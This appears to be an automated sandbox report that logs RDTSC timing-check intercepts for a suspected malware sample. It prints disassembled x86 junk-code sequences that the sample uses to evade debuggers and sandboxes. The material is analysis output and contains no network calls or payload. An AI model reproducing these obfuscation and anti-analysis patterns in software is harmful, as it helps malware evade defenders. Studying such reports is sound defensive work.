Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120845 second address: 71208F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 pushfd 0x00000006 jmp 00007F6F951A9EC3h 0x0000000b adc si, DEFEh 0x00000010 jmp 00007F6F951A9EC9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov eax, dword ptr [ebx+0000008Ch] 0x0000001f pushad 0x00000020 jmp 00007F6F951A9EBCh 0x00000025 pushfd 0x00000026 jmp 00007F6F951A9EC2h 0x0000002b adc ah, 00000028h 0x0000002e jmp 00007F6F951A9EBBh 0x00000033 popfd 0x00000034 popad 0x00000035 mov dword ptr [esi+34h], eax 0x00000038 jmp 00007F6F951A9EC6h 0x0000003d mov eax, dword ptr [ebx+18h] 0x00000040 jmp 00007F6F951A9EC0h 0x00000045 mov dword ptr [esi+38h], eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F6F951A9EBAh 0x00000051 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71208F3 second address: 7120902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120902 second address: 7120908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120908 second address: 7120949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+1Ch] 0x0000000e pushad 0x0000000f mov edx, ecx 0x00000011 pushfd 0x00000012 jmp 00007F6F946E7E40h 0x00000017 add ch, 00000078h 0x0000001a jmp 00007F6F946E7E3Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [esi+3Ch], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120949 second address: 712094D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712094D second address: 7120953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120AD2 second address: 7120B2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F951A9EC8h 0x00000009 and cx, A3F8h 0x0000000e jmp 00007F6F951A9EBBh 0x00000013 popfd 0x00000014 jmp 00007F6F951A9EC8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c js 00007F7005028A5Fh 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6F951A9EBAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120B2E second address: 7120B3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120B3D second address: 7120B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F951A9EC4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120B55 second address: 7120B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-0Ch] 0x0000000e pushad 0x0000000f push esi 0x00000010 mov si, dx 0x00000013 pop ebx 0x00000014 call 00007F6F946E7E3Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120B7D second address: 7120C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esi+04h], eax 0x00000009 jmp 00007F6F951A9EC7h 0x0000000e lea eax, dword ptr [ebx+78h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F6F951A9EC4h 0x00000018 or ax, C7D8h 0x0000001d jmp 00007F6F951A9EBBh 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F6F951A9EC8h 0x00000029 and esi, 5EDF1238h 0x0000002f jmp 00007F6F951A9EBBh 0x00000034 popfd 0x00000035 popad 0x00000036 push 00000001h 0x00000038 pushad 0x00000039 mov cl, 04h 0x0000003b pushfd 0x0000003c jmp 00007F6F951A9EC1h 0x00000041 sbb ax, B0D6h 0x00000046 jmp 00007F6F951A9EC1h 0x0000004b popfd 0x0000004c popad 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6F951A9EBDh 0x00000055 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120C32 second address: 7120C38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120C38 second address: 7120C3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120C3C second address: 7120C40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120C40 second address: 7120C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6F951A9EBBh 0x00000012 and ax, 7ABEh 0x00000017 jmp 00007F6F951A9EC9h 0x0000001c popfd 0x0000001d pushad 0x0000001e popad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120C7A second address: 7120C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120C80 second address: 7120C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120C84 second address: 7120C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120C88 second address: 7120C96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120D70 second address: 7120DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F6F946E7E42h 0x00000012 call 00007F6F946E7E42h 0x00000017 pop ecx 0x00000018 popad 0x00000019 mov ax, dx 0x0000001c popad 0x0000001d js 00007F7004566736h 0x00000023 pushad 0x00000024 call 00007F6F946E7E43h 0x00000029 pushad 0x0000002a popad 0x0000002b pop ecx 0x0000002c mov edi, 00F6A68Ah 0x00000031 popad 0x00000032 mov eax, dword ptr [ebp-04h] 0x00000035 jmp 00007F6F946E7E41h 0x0000003a mov dword ptr [esi+08h], eax 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 mov si, 9119h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120DFA second address: 7120E5C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6F951A9EC6h 0x00000008 sub eax, 239A8AA8h 0x0000000e jmp 00007F6F951A9EBBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F6F951A9EC8h 0x0000001c sbb ecx, 0A107D08h 0x00000022 jmp 00007F6F951A9EBBh 0x00000027 popfd 0x00000028 popad 0x00000029 lea eax, dword ptr [ebx+70h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120E5C second address: 7120E60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120E60 second address: 7120E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120E7B second address: 7120E85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0103F40Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120E85 second address: 7120E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push 00000001h 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6F951A9EBAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120E9A second address: 7120EF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov si, 7C5Bh 0x0000000f mov ax, 8337h 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F6F946E7E46h 0x0000001c add ecx, 44933758h 0x00000022 jmp 00007F6F946E7E3Bh 0x00000027 popfd 0x00000028 popad 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F6F946E7E40h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120EF5 second address: 7120EFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120EFB second address: 7120F56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 popad 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 call 00007F6F946E7E41h 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F6F946E7E41h 0x00000021 xor ecx, 11194DB6h 0x00000027 jmp 00007F6F946E7E41h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120FED second address: 7120FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7120FF3 second address: 7121031 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-14h] 0x0000000c jmp 00007F6F946E7E40h 0x00000011 mov ecx, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F6F946E7E47h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121031 second address: 7121059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+0Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 mov esi, ebx 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121171 second address: 71211D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F6F946E7E48h 0x0000000b or esi, 049B8C78h 0x00000011 jmp 00007F6F946E7E3Bh 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [edx], eax 0x0000001a jmp 00007F6F946E7E46h 0x0000001f mov eax, dword ptr [esi+04h] 0x00000022 jmp 00007F6F946E7E40h 0x00000027 mov dword ptr [edx+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov ch, dl 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71211D6 second address: 712126F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 pushfd 0x00000007 jmp 00007F6F951A9EBCh 0x0000000c adc esi, 65FC9868h 0x00000012 jmp 00007F6F951A9EBBh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi+08h] 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F6F951A9EC4h 0x00000025 or si, 6AC8h 0x0000002a jmp 00007F6F951A9EBBh 0x0000002f popfd 0x00000030 popad 0x00000031 mov dword ptr [edx+08h], eax 0x00000034 pushad 0x00000035 movsx edx, si 0x00000038 mov al, 38h 0x0000003a popad 0x0000003b mov eax, dword ptr [esi+0Ch] 0x0000003e jmp 00007F6F951A9EBFh 0x00000043 mov dword ptr [edx+0Ch], eax 0x00000046 pushad 0x00000047 mov ebx, eax 0x00000049 mov eax, 27ABB617h 0x0000004e popad 0x0000004f mov eax, dword ptr [esi+10h] 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F6F951A9EC9h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712126F second address: 71212B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+10h], eax 0x0000000c jmp 00007F6F946E7E3Eh 0x00000011 mov eax, dword ptr [esi+14h] 0x00000014 jmp 00007F6F946E7E40h 0x00000019 mov dword ptr [edx+14h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6F946E7E3Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71212B9 second address: 71212BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71212BD second address: 71212C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71212C3 second address: 712133E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 pushfd 0x00000006 jmp 00007F6F951A9EC8h 0x0000000b and cl, FFFFFFD8h 0x0000000e jmp 00007F6F951A9EBBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+18h] 0x0000001a jmp 00007F6F951A9EC6h 0x0000001f mov dword ptr [edx+18h], eax 0x00000022 pushad 0x00000023 jmp 00007F6F951A9EBEh 0x00000028 call 00007F6F951A9EC2h 0x0000002d mov bx, si 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov eax, dword ptr [esi+1Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712133E second address: 7121342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121342 second address: 7121358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121358 second address: 71213E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, DCA4h 0x00000007 pushfd 0x00000008 jmp 00007F6F946E7E3Dh 0x0000000d sub ch, FFFFFFE6h 0x00000010 jmp 00007F6F946E7E41h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [edx+1Ch], eax 0x0000001c jmp 00007F6F946E7E3Eh 0x00000021 mov eax, dword ptr [esi+20h] 0x00000024 pushad 0x00000025 pushad 0x00000026 mov di, B21Eh 0x0000002a jmp 00007F6F946E7E3Fh 0x0000002f popad 0x00000030 popad 0x00000031 mov dword ptr [edx+20h], eax 0x00000034 jmp 00007F6F946E7E46h 0x00000039 mov eax, dword ptr [esi+24h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007F6F946E7E47h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71213E5 second address: 71213EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71213EB second address: 71213EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71213EF second address: 71213F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71213F3 second address: 7121419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+24h], eax 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e mov bx, 6DBCh 0x00000012 popad 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6F946E7E3Eh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121419 second address: 712141F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712141F second address: 7121423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121423 second address: 7121427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121427 second address: 7121455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b jmp 00007F6F946E7E49h 0x00000010 mov ecx, dword ptr [esi+2Ch] 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121455 second address: 712145A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 712145A second address: 7121460 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121460 second address: 7121464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121464 second address: 7121479 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+2Ch], ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov dx, BDD6h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121479 second address: 7121498 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+30h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bl, 30h 0x00000012 mov esi, 3E0E3C55h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121498 second address: 71214AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F946E7E3Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71214AA second address: 71214AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71214AE second address: 71214CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c pushad 0x0000000d call 00007F6F946E7E3Dh 0x00000012 pushad 0x00000013 popad 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71214CF second address: 7121512 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6F951A9EC3h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f jmp 00007F6F951A9EBFh 0x00000014 mov word ptr [edx+32h], ax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007F6F951A9EBBh 0x00000020 pop eax 0x00000021 mov ax, di 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121512 second address: 7121550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, AFD7h 0x00000007 pushfd 0x00000008 jmp 00007F6F946E7E3Ch 0x0000000d sbb ax, 3A48h 0x00000012 jmp 00007F6F946E7E3Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [esi+34h] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 call 00007F6F946E7E3Eh 0x00000026 pop eax 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121550 second address: 71215C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6F951A9EBEh 0x00000009 jmp 00007F6F951A9EC5h 0x0000000e popfd 0x0000000f mov cx, 8887h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dword ptr [edx+34h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F6F951A9EBFh 0x00000022 xor esi, 0C951F4Eh 0x00000028 jmp 00007F6F951A9EC9h 0x0000002d popfd 0x0000002e call 00007F6F951A9EC0h 0x00000033 pop eax 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 71215C7 second address: 7121650 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 push edx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, 00000700h 0x00000011 pushad 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 push edi 0x00000017 mov ax, 7C2Fh 0x0000001b pop eax 0x0000001c popad 0x0000001d jne 00007F7004565F69h 0x00000023 pushad 0x00000024 movsx ebx, cx 0x00000027 jmp 00007F6F946E7E3Ah 0x0000002c popad 0x0000002d or dword ptr [edx+38h], FFFFFFFFh 0x00000031 pushad 0x00000032 mov cl, B0h 0x00000034 mov edx, 04FF676Eh 0x00000039 popad 0x0000003a or dword ptr [edx+3Ch], FFFFFFFFh 0x0000003e pushad 0x0000003f mov eax, edi 0x00000041 pushfd 0x00000042 jmp 00007F6F946E7E47h 0x00000047 adc esi, 2CB734CEh 0x0000004d jmp 00007F6F946E7E49h 0x00000052 popfd 0x00000053 popad 0x00000054 or dword ptr [edx+40h], FFFFFFFFh 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121650 second address: 7121654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121654 second address: 7121667 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F946E7E3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7121667 second address: 7121694 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F951A9EC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6F951A9EBDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7170C08 second address: 7170C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7170C0C second address: 7170C12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wlEp68Few5.exe RDTSC instruction interceptor: First address: 7170C12 second address: 7170C60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ch 0x00000005 pushfd 0x00000006 jmp 00007F6F946E7E3Dh 0x0000000b add esi, 2D216946h 0x00000011 jmp 00007F6F946E7E41h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F6F946E7E3Eh 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6F946E7E3Eh 0x00000028 rdtsc
